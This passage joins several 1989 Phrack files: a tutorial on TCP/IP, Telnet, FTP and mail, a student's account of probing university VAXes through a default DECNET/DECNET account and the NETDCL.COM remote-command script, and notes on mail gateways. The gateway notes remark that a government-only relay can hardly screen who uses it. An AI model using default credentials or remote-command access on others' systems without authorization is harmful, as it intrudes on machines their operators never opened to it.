across the gateways.  However, mail is almost universally supported across all
gateways, so that a person at a BITnet site can send mail messages to a
colleague at an ARPAnet site (or anywhere else for that matter).  You should
already be somewhat familiar with this, but if not refer to;

"Limbo To Infinity" (Phrack Inc., Volume Two, Issue 24, File 3 of 13) and
"Internet Domains" (Phrack Inc., Volume Three, Issue 26, File 8 of 11)

Computer networks rely on hardware and software that allow computers to
communicate.  The language that enables network communication is called a
protocol.  There are many different protocols in use today.  MIDnet uses the
TCP/IP protocols, also known as the DOD (Department of Defense) Protocol Suite.

Other networks that use TCP/IP include ARPAnet, CSnet and the NSFnet.  In fact,
all the regional networks that are linked to the NSFnet backbone are required
to use TCP/IP.  At the local campus level, TCP/IP is often used, although other
protocols such as IBM's SNA and DEC's DECnet are common.  In order to
communicate with a computer via  MIDnet and the NSFnet, a computer at a campus
must use TCP/IP directly or use a gateway that will translate its protocols
into TCP/IP.

The Internet is a world-wide computer network that is the conglomeration of
most of the large wide area networks, including ARPAnet, CSnet, NSFnet, and the
regionals, such as MIDnet.  To a lesser degree, other networks such as BITnet
that can send mail to hosts on these networks are included as part of the
Internet.  This huge network of networks, the Internet, as you have by now read
all about in the pages of Phrack Inc., is a rapidly growing and very complex
entity that allows sophisticated communication between scientists, students,
government officials and others.  Being a part of this community is both
exciting and challenging.

This chapter of the Future Transcendent Saga gives a general description of the
protocols and software used in MIDnet and the NSFNet.  A discussion of several
of the more commonly used networking tools is also included to enable you to
make practical use of the network as soon as possible.


The DOD Protocol Suite
~~~~~~~~~~~~~~~~~~~~~~
The DOD Protocol Suite includes many different protocols.  Each protocol is a
specification of how communication is to occur between computers.  Computer
hardware and software vendors use the protocol to create programs and sometimes
specialized hardware in order to implement the network function intended by the
protocol.  Different implementations of the same protocol exist for the varied
hardware and operating systems found in a network.

The three most commonly used network functions are:

Mail          -- Sending and receiving messages
File Transfer -- Sending and receiving files
Remote Login  -- Logging into a distant computer

Of these, mail is probably the most commonly used.

In the TCP/IP world, there are three different protocols that realize these
functions:

SMTP   -- (Simple Mail Transfer Protocol) Mail
FTP    -- (File Transfer Protocol) sending and receiving files
Telnet -- Remote login

How to use these protocols is discussed in the next section.  At first glance,
it is not obvious why these three functions are the most common.  After all,
mail and file transfer seem to be the same thing.  However, mail messages are
not identical to files, since they are usually comprised of only ASCII
characters and are sequential in structure.  Files may contain binary data and
have complicated, non-sequential structures.  Also, mail messages can usually
tolerate some errors in transmission whereas files should not contain any
errors.  Finally, file transfers usually occur in a secure setting (i.e. The
users who are transferring files know each other's names and passwords and are
permitted to transfer the file, whereas mail can be sent to anybody as long as
their name is known).

While mail and transfer accomplish the transfer of raw information from one
computer to another, Telnet allows a distant user to process that information,
either by logging in to a remote computer or by linking to another terminal.
Telnet is most often used to remotely log in to a distant computer, but it is
actually a general-purpose communications protocol.  I have found it incredibly
useful over the last year.  In some ways, it could be used for a great deal of
access because you can directly connect to another computer anywhere that has
TCP/IP capabilities, however please note that Telnet is *NOT* Telenet.

There are other functions that some networks provide, including the following:

- Name to address translation for networks, computers and people
- The current time
- Quote of the day or fortune
- Printing on a remote printer, or use of any other remote peripheral
- Submission of batch jobs for non-interactive execution
- Dialogues and conferencing between multiple users
- Remote procedure call (i.e. Distributing program execution over several
                              remote computers)
- Transmission of voice or video information

Some of these functions are still in the experimental stages and require faster
computer networks than currently exist.  In the future, new functions will
undoubtedly be invented and existing ones improved.

The DOD Protocol Suite is a layered network architecture, which means that
network functions are performed by different programs that work independently
and in harmony with each other.  Not only are there different programs but
there are different protocols.  The protocols SMTP, FTP and Telnet are
described above.  Protocols have been defined for getting the current time, the
quote of the day, and for translating names.  These protocols are called
applications protocols because users directly interact with the programs that
implement these protocols.

The Transmission Control Protocol, TCP, is used by many of the application
protocols.  Users almost never interact with TCP directly.  TCP establishes a
reliable end-to-end connection between two processes on remote computers.  Data
is sent through a network in small chunks called packets to improve reliability
and performance.  TCP ensures that packets arrive in order and without errors.
If a packet does have errors, TCP requests that the packet be retransmitted.

In turn, TCP calls upon IP, Internet Protocol, to move the data from one
network to another.  IP is still not the lowest layer of the architecture,
since there is usually a "data link layer protocol" below it.  This can be any
of a number of different protocols, two very common ones being X.25 and
Ethernet.

FTP, Telnet and SMTP are called "application protocols", since they are
directly used by applications programs that enable users to make use of the
network.  Network applications are the actual programs that implement these
protocols and provide an interface between the user and the computer.  An
implementation of a network protocol is a program or package of programs that
provides the desired network function such as file transfer.  Since computers
differ from vendor to vendor (e.g. IBM, DEC, CDC), each computer must have its
own implementation of these protocols.  However, the protocols are standardized
so that computers can interoperate over the network (i.e. Can understand and
process each other's data).  For example, a TCP packet generated by an IBM
computer can be read and processed by a DEC computer.

In many instances, network applications programs use the name of the protocol.
For example, the program that transfers files may be called "FTP" and the
program that allows remote logins may be called "Telnet."  Sometimes these
protocols are incorporated into larger packages, as is common with SMTP.  Many
computers have mail programs that allow users on the same computer to send mail
to each other.  SMTP functions are often added to these mail programs so that
users can also send and receive mail through a network.  In such cases, there
is no separate program called SMTP that the user can access, since the mail
program provides the user interface to this network function.

Specific implementation of network protocols, such as FTP, are tailored to the
computer hardware and operating system on which they are used.  Therefore, the
exact user interface varies from one implementation to another.  For example,
the FTP protocol specifies a set of FTP commands which each FTP implementation
must understand and process.  However, these are usually placed at a low level,
often invisible to the user, who is given a higher set of commands to use.

These higher-level commands are not standardized so they may vary from one
implementation of FTP to another.  For some operating systems, not all of these
commands make equal sense, such as "Change Directory," or may have different
meanings.  Therefore the specific user interface that the user sees will
probably differ.

This file describes a generic implementation of the standard TCP/IP application
protocols.  Users must consult local documentation for specifics at their
sites.


Names and Addresses In A Network
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
In DOD Protocol Suite, each network is given a unique identifying number.  This
number is assigned by a central authority, namely the Network Information
Center run by SRI, abbreviated as SRI-NIC, in order to prevent more than one
network from having the same network number.  For example, the ARPAnet has
network number 10 while MIDnet has a longer number, namely 128.242.

Each host in a network has a unique identification so other hosts can specify
them unambiguously.  Host numbers are usually assigned by the organization that
manages the network, rather than one central authority.  Host numbers do not
need to be unique throughout the whole Internet but two hosts on the same
network need to have unique host numbers.

The combination of the network number and the host number is called the IP
address of the host and is specified as a 32-bit binary number.  All IP
addresses in the Internet are expressible as 32-bit numbers, although they are
often written in dotted decimal notation.  Dotted decimal notation breaks the
32-bit number into four eight-bit parts or octets and each octet is specified
as a decimal number.  For example, 00000001 is the binary octet that specifies
the decimal number 1, while 11000000 specifies 192.  Dotted decimal notation
makes IP addresses much easier to read and remember.

Computers in the Internet are also identified by hostnames, which are strings
of characters, such as "phrackvax."  However, IP packets must specify the
32-bit IP address instead of the hostname so  some way to translating hostnames
to IP addresses must exist.

One way is to have a table of hostnames and their corresponding IP addresses,
called a hosttable.  Nearly every TCP/IP implementation has such a hosttable,
although the weaknesses of this method are forcing a shift to a new scheme
called the domain name system.  In UNIX systems, the hosttable is often called
"/etc/hosts."  You can usually read this file and find out what the IP
addresses of various hosts are.  Other systems may call this file by a
different name and make it unavailable for public viewing.

Users of computers are generally given accounts to which all charges for
computer use are billed.  Even if computer time is free at an installation,
accounts are used to distinguish between the users and enforce file
protections.  The generic term "username" will be used in this file to refer to
the name by which the computer account is accessed.

In the early days of the ARPAnet which was the first network to use the TCP/IP
protocols, computer users were identified by their username, followed by a
commercial "at" sign (@), followed by the hostname on which the account
existed.  Networks were not given names, per se, although the IP address
specified a network number.

For example, "knight@phrackvax" referred to user "knight" on host "phrackvax."
This did not specify which network "phrackvax" was on, although that
information could be obtained by examining the hosttable and the IP address for
"phrackvax."  (However, "phrackvax" is a ficticious hostname used for this
presentation.)

As time went on, every computer on the network had to have an entry in its
hosttable for every other computer on the network.  When several networks
linked together to form the Internet, the problem of maintaining this central
hosttable got out of hand.  Therefore, the domain name scheme was introduced to
split up the hosttable and make it smaller and easier to maintain.

In the new domain name scheme, users are still identified by their usernames,
but hosts are now identified by their hostname and any and all domains of which
they are a part.  For example, the following address,
"KNIGHT@UMCVMB.MISSOURI.EDU" specifies username "KNIGHT" on host "UMCVMB".
However, host "UMCVMB" is a part of the domain "MISSOURI" " which is in turn
part of the domain "EDU".  There are other domains in "EDU", although only one
is named "MISSOURI".  In the domain "MISSOURI", there is only one host named
"UMCVMB".

However, other domains in "EDU" could theoretically have hosts named "UMCVMB"
(although I would say that this is rather unlikely in this example).  Thus the
combination of hostname and all its domains makes it unique.  The method of
translating such names into IP addresses is no longer as straightforward as
looking up the hostname in a table.  Several protocols and specialized network
software called nameservers and resolvers implement the domain name scheme.

Not all TCP/IP implementations support domain names because it is rather new.
In those cases, the local hosttable provides the only way to translate
hostnames to IP addresses.  The system manager of that computer will have to
put an entry into the hosttable for every host that users may want to connect
to.  In some cases, users may consult the nameserver themselves to find out the
IP address for a given hostname and then use that IP address directly instead
of a hostname.

I have selected a few network hosts to demonstrate how a host system can be
specified by both the hostname and host numerical address.  Some of the nodes I
have selected are also nodes on BITnet, perhaps even some of the others that I
do not make a note of due a lack of omniscent awareness about each and every
single host system in the world :-)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Numerical      Hostname                   Location                       BITnet
---------      --------                   --------                       ------
18.72.0.39     ATHENA.MIT.EDU             (Mass. Institute of Technology)     ?
26.0.0.73      SRI-NIC.ARPA               (DDN Network Information Center)    -
36.21.0.13     MACBETH.STANFORD.EDU       (Stanford University)               ?
36.21.0.60     PORTIA.STANFORD.EDU        (Stanford University)               ?
128.2.11.131   ANDREW.CMU.EDU             (Carnegie Mellon University)   ANDREW
128.3.254.13   LBL.GOV                    (Lawrence Berkeley Labrotories)   LBL
128.6.4.7      RUTGERS.RUTGERS.EDU        (Rutgers University)                ?
128.59.99.1    CUCARD.MED.COLUMBIA.EDU    (Columbia University)               ?
128.102.18.3   AMES.ARC.NASA.GOV          (Ames Research Center [NASA])       -
128.103.1.1    HARVARD.EDU                (Harvard University)          HARVARD
128.111.24.40  HUB.UCSB.EDU               (Univ. Of Calif-Santa Barbara)      ?
128.115.14.1   LLL-WINKEN.LLNL.GOV        (Lawrence Livermore Labratories)    -
128.143.2.7    UVAARPA.VIRGINIA.EDU       (University of Virginia)            ?
128.148.128.40 BROWNVM.BROWN.EDU          (Brown University)              BROWN
128.163.1.5    UKCC.UKY.EDU               (University of Kentucky)         UKCC
128.183.10.4   NSSDCA.GSFC.NASA.GOV       (Goddard Space Flight Center [NASA])-
128.186.4.18   RAI.CC.FSU.EDU             (Florida State University)        FSU
128.206.1.1    UMCVMB.MISSOURI.EDU        (Univ. of Missouri-Columbia)   UMCVMB
128.208.1.15   MAX.ACS.WASHINGTON.EDU     (University of Washington)        MAX
128.228.1.2    CUNYVM.CUNY.EDU            (City University of New York)  CUNYVM
129.10.1.6     NUHUB.ACS.NORTHEASTERN.EDU (Northeastern University)       NUHUB
131.151.1.4    UMRVMA.UMR.EDU             (University of Missouri-Rolla) UMRVMA
192.9.9.1      SUN.COM                    (Sun Microsystems, Inc.)            -
192.33.18.30   VM1.NODAK.EDU              (North Dakota State Univ.)    NDSUVM1
192.33.18.50   PLAINS.NODAK.EDU           (North Dakota State Univ.)    NDSUVAX

Please Note:  Not every system on BITnet has an IP address.  Likewise, not
              every system that has an IP address is on BITnet.  Also, while
              some locations like Stanford University may have nodes on BITnet
              and have hosts on the IP as well, this does not neccessarily
              imply that the systems on BITnet and on IP (the EDU domain in
              this case) are the same systems.

              Attempts to gain unauthorized access to systems on the Internet
              are not tolerated and is legally a federal offense.  At some
              hosts, they take this very seriously, especially the government
              hosts such as NASA's Goddard Space Flight Center, where they do
              not mind telling you so at the main prompt when you connect to
              their system.

              However, some nodes are public access to an extent.  The DDN
              Network Information Center can be used by anyone.  The server and
              database there have proven to be an invaluable source of
              information when locating people, systems, and other information
              that is related to the Internet.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Telnet

~~~~~~
Remote login refers to logging in to a remote computer from a terminal
connected to a local computer.  Telnet is the standard protocol in the DOD
Protocol Suite for accomplishing this.  The "rlogin" program, provided with
Berkeley UNIX systems and some other systems, also enables remote login.

For purposes of discussion, the "local computer" is the computer to which your
terminal is directly connected while the "remote computer" is the computer on
the network to which you are communicating and to which your terminal is *NOT*
directly connected.

Since some computers use a different method of attaching terminals to
computers, a better definition would be the following:  The "local computer" is
the computer that you are currently using and the "remote computer" is the
computer on the network with which you are or will be communicating.  Note that
the terms "host" and "computer" are synonymous in the following discussion.

To use Telnet, simply enter the command: TELNET

The prompt that Telnet gives is:  Telnet>

(However, you can specify where you want to Telnet to immediately and bypass
the the prompts and other delays by issuing the command:  TELNET [location].)

There is help available by typing in ?.  This prints a list of all the valid
subcommands that Telnet provides with a one-line explanation.

Telnet> ?

To connect to to another computer, use the open subcommand to open a connection
to that computer.  For example, to connect to the host "UMCVMB.MISSOURI.EDU",
do "open umcvmb.missouri.edu"

Telnet will resolve (i.e. Translate, the hostname "umcvmb.missouri.edu" into an
IP address and will send a packet to that host requesting login.  If the remote
host decides to let you attempt a login, it prompts you for your username and
password.  If the host does not respond, Telnet will "time out" (i.e. Wait for
a reasonable amount of time such as 20 seconds) and then terminate with a
message such as "Host not responding."

If your computer does not have an entry for a remote host in its hosttable and
it cannot resolve the name, you can use the IP address explicitly in the telnet
command.  For example,

TELNET 26.0.0.73 (Note:  This is the IP address for the DDN Network Information
                 Center [SRI-NIC.ARPA])

If you are successful in logging in, your terminal is connected to the remote
host.  For all intents and purposes, your terminal is directly hard-wired to
that host and you should be able to do anything on your remote terminal that
you can do at any local terminal.  There are a few exceptions to this rule,
however.

Telnet provides a network escape character, such as CONTROL-T. You can find out
what the escape character is by entering the "status" subcommand:

Telnet> status

You can change the escape character by entering the "escape" subcommand:

Telnet> escape

When you type in the escape character, the Telnet prompt returns to your screen
and you can enter subcommands.  For example, to break the connection, which
usually logs you off the remote host, enter the subcommand "quit":

Telnet> quit

Your Telnet connection usually breaks when you log off the remote host, so the
"quit" subcommand is not usually used to log off.

When you are logged in to a remote computer via Telnet, remember that there is
a time delay between your local computer and the remote one.  This often
becomes apparent to users when scrolling a long file across the terminal screen
nd they wish to cancel the scrolling by typing CONTROL-C or something similar.
After typing the special control character, the scrolling continues.  The
special control character takes a certain amount of time to reach the remote
computer which is still scrolling information.  Thus response from the remote
computer will not likely be as quick as response from a local computer.

Once you are remotely logged on, the computer you are logged on to effectively
becomes your "local computer," even though your original "local computer" still
considers you logged on.  You can log on to a third computer which would then
become your "local computer" and so on.  As you log out of each session, your
previous session becomes active again.


File Transfer
~~~~~~~~~~~~~

FTP is the program that allows files to be sent from one computer to another.
"FTP" stands for "File Transfer Protocol".

When you start using FTP, a communications channel with another computer on the
network is opened.  For example, to start using FTP and initiate a file
transfer session with a computer on the network called "UMCVMB", you would
issue the following subcommand:

FTP UMCVMB.MISSOURI.EDU

Host "UMCVMB" will prompt you for an account name and password.  If your login
is correct, FTP will tell you so, otherwise it will say "login incorrect."  Try
again or abort the FTP program.  (This is usually done by typing a special
control character such as CONTROL-C.  The "program abort" character varies from
system to system.)

Next you will see the FTP prompt, which is:

Ftp>

There are a number of subcommands of FTP.  The subcommand "?" will list these
commands and a brief description of each one.

You can initiate a file transfer in either direction with FTP, either from the
remote host or to the remote host.  The "get" subcommand initiates a file
transfer from the remote host (i.e. Tells the remote computer to send the file
to the local computer [the one on which you issued the "ftp" command]).  Simply
enter "get" and  FTP will prompt you for the remote host's file name and the
(new) local host's file name.  Example:

Ftp> get
Remote file name?
theirfile
local file name?
myfile

ou can abbreviate this by typing both file names on the same line as the "get"
subcommand.  If you do not specify a local file name, the new local file will
be called the same thing as the remote file.  Valid FTP subcommands to get a
file include the following:

get theirfile myfile
get doc.x25

The "put" subcommand works in a similar fashion and is used to send a file from
the local computer to the remote computer.  Enter the command "put" and FTP
will prompt you for the local file name and then the remote file name.  If the
transfer cannot be done because the file doesn't exist or for some other
reason, FTP will print an error message.

There are a number of other subcommands in FTP that allow you to do many more
things.  Not all of these are standard so consult your local documentation or
type a question mark at the FTP prompt.  Some functions often built into FTP
include the ability to look at files before getting or putting them, the
ability to change directories, the ability to delete files on the remote
computer, and the ability to list the directory on the remote host.

An intriguing capability of many FTP implementations is "third party
transfers."  For example, if you are logged on computer A and you want to cause
computer B to send a file to computer C, you can use FTP to connect to computer
B and use the "rmtsend" command.  Of course, you have to know usernames and
passwords on all three computers, since FTP never allows you to peek into
someone's directory and files unless you know their username and password.

The "cd" subcommand changes your working directory on the remote host.  The
"lcd" subcommand changes the directory on the local host.  For UNIX systems,
the meaning of these subcommands is obvious.  Other systems, especially those
that do not have directory-structured file system, may not implement these
commands or may implement them in a different manner.

The "dir" and "ls" subcommands do the same thing, namely list the files in the
working directory of of the remote host.

The "list" subcommand shows the contents of a file without actually putting it
into a file on the local computer.  This would be helpful if you just wanted to
inspect a file.  You could interrupt it before it reached the end of the file
by typing CONTROL-C or some other special character.  This is dependent on your
FTP implementation.

The "delete" command can delete files on the remote host.  You can also make
and remove directories on the remote host with "mkdir" and "rmdir".  The
"status" subcommand will tell you if you are connected and with whom and what
the state of all your options are.

If you are transferring binary files or files with any non-printable
characters, turn binary mode on by entering the "binary" subcommand:

binary

To resume non-binary transfers, enter the "ascii" subcommand.

Transferring a number of files can be done easily by using "mput" (multiple
put) and "mget" (multiple get).  For example, to get every file in a particular
directory, first issue a "cd" command to  change to that directory and then an
"mget" command with an asterisk to indicate every file:

cd somedirectory
mget *

When you are done, use the "close" subcommand to break the communications link.
You will still be in FTP, so you must use the "bye" subcommand to exit FTP and
return to the command level.  The "quit" subcommand will close the connection
and exit from FTP at the same time.


Mail
~~~~
Mail is the simplest network facility to use in many ways.  All you have to do
is to create your message, which can be done with a file editor or on the spur
of the moment, and then send it.  Unlike FTP and Telnet, you do not need to
know the password of the username on the remote computer.  This is so because
you cannot change or access the files of the remote user nor can you use their
account to run programs.  All you can do is to send a message.

There is probably a program on your local computer which does mail between
users on that computer.  Such a program is called a mailer.  This may or may
not be the way to send or receive mail from other computers on the network,
although integrated mailers are more and more common.  UNIX mailers will be
used as an example in this discussion.

Note that the protocol which is used to send and receive mail over a TCP/IP
network is called SMTP, the "Simple Mail Transfer Protocol."  Typically, you
will not use any program called SMTP, but rather your local mail program.

UNIX mailers are usually used by invoking a program named "mail".  To receive
new mail, simply type "mail".

There are several varieties of UNIX mailers in existence.  Consult your local
documentation for details.  For example, the command "man mail" prints out the
manual pages for the mail program on your computer.

To send mail, you usually specify the address of the recipient on the mail
command.  For example: "mail knight@umcvmb.missouri.edu" will send the
following message to username "knight" on host "umcvmb".

You can usually type in your message one line at a time, pressing RETURN after
each line and typing CONTROL-D to end the message. Other facilities to include
already-existing files sometimes exist.  For example, Berkeley UNIXes allow you
to enter commands similar to the following to include a file in your current
mail message:

r myfile

In this example, the contents of "myfile" are inserted into the message at this
point.

Most UNIX systems allow you to send a file through the mail by using input
redirection.  For example:

mail knight@umcvmb.missouri.edu < myfile

In this example, the contents of "myfile" are sent as a message to "knight" on
"umcvmb."

Note that in many UNIX systems the only distinction between mail bound for
another user on the same computer and another user on a remote computer is
simply the address specified.  That is, there is no hostname for local
recipients.  Otherwise, mail functions in exactly the same way.  This is common
for integrated mail packages.  The system knows whether to send the mail
locally or through the network based on the address and the user is shielded
from any other details.


                  "The Quest For Knowledge Is Without End..."
_______________________________________________________________________________



                                ==Phrack Inc.==

                     Volume Three, Issue 27, File 7 of 12

               <:><:><:><:><:><:><:><:><:><:><:><:><:><:><:><:>
               <:>                                          <:>
               <:>          The Making Of A Hacker          <:>
               <:>                                          <:>
               <:>        by Framstag of West Germany       <:>
               <:>                                          <:>
               <:>                June 2, 1989              <:>
               <:>                                          <:>
               <:><:><:><:><:><:><:><:><:><:><:><:><:><:><:><:>


Prologue For None VMS Users
~~~~~~~~~~~~~~~~~~~~~~~~~~~
     DECnet is the network for DEC machines, in most cases you can say VAXes.
DECnet allows you to do:   - e-mail
                           - file transfer
                           - remote login
                           - remote command
                           - remote job entry
                           - PHONE
     PHONE is an interactive communication between users and is equal to TALK
on UNIX or a "deluxe"-CHAT on VM/CMS.

     BELWUE, the university network of the state Baden-Wuerttemberg in
West Germany contains (besides other networks) a DECnet with about 400 VAXes.
On every VAX there is standard-account called DECNET with pw:= DECNET, which is
not reachable via remote login.  This account is provided for several
DECnet-Utilities and as a pseudo-guest-account.  The DECNET-account has very
restricted privileges:  You cannot edit a file or make another remote login.

    The HELP-menu is equipped by the system and is similar to the MAN command
on UNIX.

    More information on DECnet can be found in "Looking Around In DECnet" by
Deep Thought in this very issue of Phrack Inc.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

     Here, at the University of Ulm, we have an *incredibly* ignorant computer
center staff, with an even bigger lack of system-literature (besides the 80 kg
of VAX/VMS-manuals).  The active may search for information by himself, which
is over the level of "run," "FORTRAN," or "logout."  My good luck that I have
other accounts in the BELWUE-DECnet, where more information is offered for the
users.  I am a regular student in Ulm and all my accounts are completely legal
and corresponding to the German laws.  I don't call myself a "hacker," I feel
more like a "user" (...it's more a defining-problem).

     In the HELP-menu in a host in Tuebingen I found the file netdcl.com and
the corresponding explanation, which sends commands to the DECNET-Account of
other VAXes and executes them there (remote command).  The explanation in the
HELP-menu was idiot-proof -- therefore for me, too :-)

     With the command "$ mcr ncp show known nodes" you can obtain a list of all
netwide active VAXes, as is generally known, and so I pinged all these VAXes to
look for more information for a knowledge-thirsty user.  With "help", "dir" and
other similar commands I look around on those DECnet accounts, always watching
for topics related to the BELWUE-network.  It's a pity, that 2/3 of all VAXes
have locked the DECNET-Account for NETDCL.COM.  Their system managers are
probably afraid of unauthorized access, but I cannot imagine how there could be
such an unauthorized access, because you cannot log on this account -- no
chance for trojan horses, etc.

     Some system managers called me back after I visited their VAX to chat with
me about the network and asked me if they could help me in any way. One sysop
from Stuttgart even sent me a version of NETDCL.COM for the ULTRIX operation
system.

     Then, after a month, the  H O R R O R  came over me in shape of a the
following mail:

--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
From:   TUEBINGEN::SYSTEM       31-MAY-1989 15:31:11.38
To:     FRAMSTAG
CC:
Subj:   don't make any crap, or you'll be kicked out!

From:   ITTGPX::SYSTEM       29-MAY-1989 16:46
To:     TUEBINGEN::SYSTEM
Subj:   System-breaking-in 01-May-1989

To the system manager of the Computer TUEBINGEN,

On May 1st 1989 we had a System-breaking-in in our DECNET-account, which
started from your machine.  By help of our accounting we ascertained your user
FRAMSTAG to have emulated an interactive log-on on our backbone-node and on
every machine of our VAX-cluster with the "trojan horse" NETDCL.COM.  Give us
this user's name and address and dear up the occurrence completely.  We point
out that the user is punishable.  In case of repetition we would be forced to
take corresponding measures.  We will check whether our system got injured.  If
not, this time we will disregard any measure.  Inform us via DECnet about your
investigation results -- we are attainable by the nodenumber 1084::system

Dipl.-Ing. Michael Hager
--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---

     My system manager threatened me with the deleting of my account, if I
would not immediately enlighten the affair.  *Gulp*!
     I was conscious about my innocence, but how to tell it to the others?  I
explained, step by step, everything to my system manager.  He then understood
after a while, but the criminal procedure still hovered over me... so, I took
quickly to my keyboard, to compose file of explanations and to send it to that
angry system manager in Stuttgart (node 1084 is an institute there).  But no
way out:  He had run out of disk quota and my explanation-mail sailed into the
nirwana:

--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
$ mail explanation
  To:   1084::system
%MAIL-E, error sending to user SYSTEM at 1084
%MAIL-E-OPENOUT, error opening SYS$SYSROOT:[SYSMGR]MAIL$00040092594FD194.MAI;
as output
-RMS-E-CRE, ACP file create failed
-SYSTEM-F-EXDISKQUOTA, disk quota exceeded
--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---

     Also the attempt of a connection with the PHONE-facilty failed:  In his
borderless hacker-paranoia, he cut off his PHONE... and nowhere is a list with
the REAL-addresses of the virtual DECnet-addresses available (to prevent
hacking).  Now I stood there with the brand "DANGEROUS HACKER!" and I had no
chance to vindicate myself.  I poured out my troubles to an acquaintance of
mine, who is a sysop in the computer-center in Freiburg.  He asked other sysops
and managers thru the whole BELWUE-network until someone gave him a telephone
number after a few days -- and that was the right one!

     I phoned to this Hager and told him what I had done with his
DECnet-account and also what NOT.  I wanted to know which crime I had
committed.  He promptly cancelled all of his reproaches, but he did not excuse
his defamous incriminations.  I entreated him to inform my system manager in
Tuebingen that I have done nothing illegal and to stop him from erasing my
account.  This happens already to a fellow student of mine (in this case, Hager
was also guilty).  He promised me that he would officially cancel his
reproaches.

     After over a week this doesn't happen (I'm allowed to use my account
further on).  In return for it, I received a new mail from Hager on another
account of mine:

--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
From:   1084::HAGER         1-JUN-1989 12:51
To:     50180::STUD_11
Subj:   System-breaking-in

On June 1st 1989 you have committed a system-breaking-in on at least one of our
VAXes.  We were able to register this occurrence.  We would be forced to take
further measure if you did not dear up the occurrence completely until June
6th.

Of course the expenses involved would be imposed on you.  Hence enlightenment
must be in your own interest.

We are attainable via DECnet-mail with the address 1084::HAGER or via following
address:

Institut fuer Technische Thermodynamik und Thermische Verfahrenstechnik
Dipl.-Ing. M. Hager    Tel.: 0711/685-6109
Dipl.-Ing. M. Mrzyglod Tel.: 0711/685-3398
Pfaffenwaldring 9/10-1
7000 Stuttgart-80

 M. Hager
 M. Mrzyglod
--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---

This was the reaction of my attempt: "$ PHONE 1084::SYSTEM".  I have not
answered to this mail.  I AM SICK OF IT!


                                   Framstag
                          (FRAMSTAG@DTUPEV5A.BITNET)

         With Special Thanks For Translation Assistance To Schrulli B.
_______________________________________________________________________________

ÿÿ


                                ==Phrack Inc.==
 
                     Volume Three, Issue 28, File #4 of 12
 
                              Network Miscellany
                              ~~~~~~~~~~~~~~~~~~
                                 by Taran King
 
                                 June 1, 1989
 
 
ACSNET
~~~~~~
Australian Computer Science Network (ACSNET), also known as Oz, has its gateway
through the CSNET node munnari.oz.au and if you cannot directly mail to the
oz.au domain, try either username%munnari.oz.au@UUNET.UU.NET or
munnari!username@UUNET.UU.NET.
 
AT&T MAIL
~~~~~~~~~
AT&T Mail is a mailing service of AT&T, probably what you might call it's
MCI-Mail equivalent.  It is available on the UUCP network as node name attmail
but I've had problems having mail get through.  Apparently, it does cost money
to mail to this service and the surrounding nodes are not willing to pick up
the tab for the ingoing mail, or at least, this has seemingly been the case
thus far.  I believe, though, that perhaps routing to att!attmail!user would
work.
 
AT&T recently announced six new X.400 interconnections between AT&T Mail and
electronic mail services in the U.S., Korea, Sweden, Australia, and Finland.
In the U.S., AT&T Mail is now interconnected with Telenet Communications
Corporation's service, Telemail, allowing users of both services to exchange
messages easily.  With the addition of these interconnections, the AT&T Mail
Gateway 400 Service allows AT&T Mail subscribers to exchange messages with
users of the following electronic messaging systems:
 
Company                    E-Mail Name*            Country
-------                    ------------            -------
TeleDelta                  TeDe 400                Sweden
OTC                        MPS400                  Australia
Telecom-Canada             Envoy100                Canada
DACOM                      DACOM MHS               Korea
P&T-Tele                   MailNet 400             Finland
Helsinki Telephone Co.     ELISA                   Finland
Dialcom                    Dialcom                 USA
Telenet                    Telemail                USA
KDD                        Messavia                Japan
Transpac                   ATLAS400                France
 
The interconnections are based on the X.400 standard, a set of guidelines for
the format, delivery and receipt of electronic messages recommended by an
international standards committee the CCITT.  International X.400 messages
incur a surcharge.  They are:
 
                 To Canada:
                    Per note:            $.05
                    Per message unit:    $.10
 
                 To other international locations:
                    Per note:            $.20
                    Per message unit:    $.50
 
There is no surcharge for X.400 messages within the U.S.  The following are
contacts to speak with about mailing through these mentioned networks.  Other
questions can be directed through AT&T Mail's toll-free number, 1-800-624-5672.
 
MHS Gateway:  mhs!atlas                     MHS Gateway:  mhs!dacom
Administrator:  Bernard Tardieu             Administrator:  Bob Nicholson
Transpac                                    AT&T
Phone:  3399283203                          Morristown, NJ  07960
Phone:  +1 201 644 1838
 
MHS Gateway:  mhs!dialcom                   MHS Gateway:  mhs!elisa
Administrator:  Mr. Laraman                 Administrator:  Ulla Karajalainen
Dialcom                                     Nokia Data
South Plainfield, NJ  07080                 Phone:  01135804371
Phone:  +1 441 493 3843
 
MHS Gateway:  mhs!envoy                     MHS Gateway:  mhs!kdd
Administrator:  Kin C. Ma                   Administrator:  Shigeo Lwase
Telecom Canada                              Kokusai Denshin Denwa CO.
Phone:  +1 613 567 7584                     Phone:  8133477419
 
MHS Gateway:  mhs!mailnet                   MHS Gateway:  mhs!otc
Administrator:  Kari Aakala                 Administrator:  Gary W. Krumbine
Gen Directorate Of Post &                   AT&T Information Systems
Phone:  35806921730                         Lincroft, NJ  07738
                                            Phone:  +1 201 576 2658
 
MHS Gateway:  mhs!telemail                  MHS Gateway:  mhs
Administrator:  Jim Kelsay                  Administrator:  AT&T Mail MHS
GTE Telenet Comm Corp                                       Gateway
Reston, VA  22096                           AT&T
Phone:  +1 703 689 6034                     Lincroft, NJ  08838
                                            Phone:  +1 800 624 5672
 
CMR
~~~
Previously known as Intermail, the Commercial Mail Relay (CMR) Service is a
mail relay service between the Internet and three commercial electronic mail
systems:  US Sprint/Telenet, MCI-Mail, and DIALCOM systems (i.e. Compmail,
NSFMAIL, and USDA-MAIL).
 
An important note:  The only requirement for using this mail gateway is that
the work conducted must be DARPA sponsored research and other approved
government business.  Basically, this means that unless you've got some
government-related business, you're not supposed to be using this gateway.
Regardless, it would be very difficult for them to screen everything that goes
through their gateway.  Before I understood the requirements of this gateway, I
was sending to a user of MCI-Mail and was not contacted about any problems with
that communication.  Unfortunately, I mistyped the MCI-Mail address on one of
